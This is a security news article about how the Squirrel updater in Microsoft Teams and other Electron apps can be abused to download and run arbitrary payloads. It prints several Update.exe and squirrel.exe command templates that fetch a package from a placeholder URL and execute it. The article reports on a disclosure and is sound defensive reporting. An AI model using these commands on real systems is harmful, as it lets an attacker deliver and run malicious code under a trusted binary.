The update mechanism as it is currently implemented in Microsoft Teams desktop app allows downloading and executing arbitrary files on the system.

The same issue affects GitHub, WhatApp, and UiPath software for desktop computers but it can be used only to download a payload.

These applications rely on the open source Squirrel project to manage installation and updating routines, which uses NuGet package manager to create the necessary files.

Multiple security researchers discovered that using the 'update' command for a vulnerable application it is possible to execute an arbitrary binary in the context of the current user. The same goes for 'squirrel.exe.'

With Microsoft Teams, a payload is added to its folder and executed automatically using either of the following commands:

Update.exe --update [url to payload]
squirrel.exe --update [url to payload]

The commands can be used with other arguments, including 'download,' which enables retrieving the payload in the form of a NuGet package from a remote location.

Update.exe --download [url to payload]
squirrel.exe --download [url to payload]

Another command can be used to both download and execute a malicious package from a remote location:

Update.exe --updateRollback [url to payload]
squirrel.exe --updateRollback [url to payload]

The same method is valid for "squirrel.exe," which is also part of the Microsoft Teams installation package. Both executables are now part of the Living Off The Land Binaries and Scripts (LOLBAS) database on GitHub, directly accessible here and here.

Reverse engineer Reegun Richard tested the issue on Microsoft Teams and reported it to the company on June 4. The application continues to be vulnerable at this point as Microsoft informed the researcher that the fix would come in a future release of the software.

Trying to replicate the effect with GitHub, and WhatApp, and UiPath did not achieve execution for the payload and only downloading it from a remote server was possible.

"In this scenario, an attacker can use this method to mask the payload download," which is still useful for an adversary, Richard told BleepingComputer.

Rooting for the blue team, Richard wanted to keep the details private until Microsoft Teams made the details public before Microsoft released a patch.

Another researcher playing for the red team, Mr. Un1k0d34 of the RingZer0 Team, had found the issue and published the details.

In a thread on Twitter, Richard explains the process of finding the bug and its root. He started from previous research published in late March by Hexacorn, which focused on living-of-the-land binaries (lolbins) in Electron-based apps.

Richard also made a video demonstrating how an attacker could use Microsoft Teams to get a shell on the target computer. Full details about exploiting this issue are available in a blog post from the researcher.

Microsoft Teams is intended for business use as it is a step up from Skype for Business. It is an alternative to Slack and offers unified communications with video meeting, file storage, and collaboration features. Its supports extensions for integration with products from other developers.

Update [07/02/2019]: Article updated to add a new parameter that can be used to both download and execute a package hosted on a remote server, according to Reegun Richard.

Related Articles:

Windows 11 gets single Teams app for work and personal accounts

5 Steps to Improve Your Security Posture in Microsoft Teams

Google shares fix for Pixel phones hit by bad system update

Microsoft Teams phishing pushes DarkGate malware via group chats

Microsoft Teams hit by second outage in three days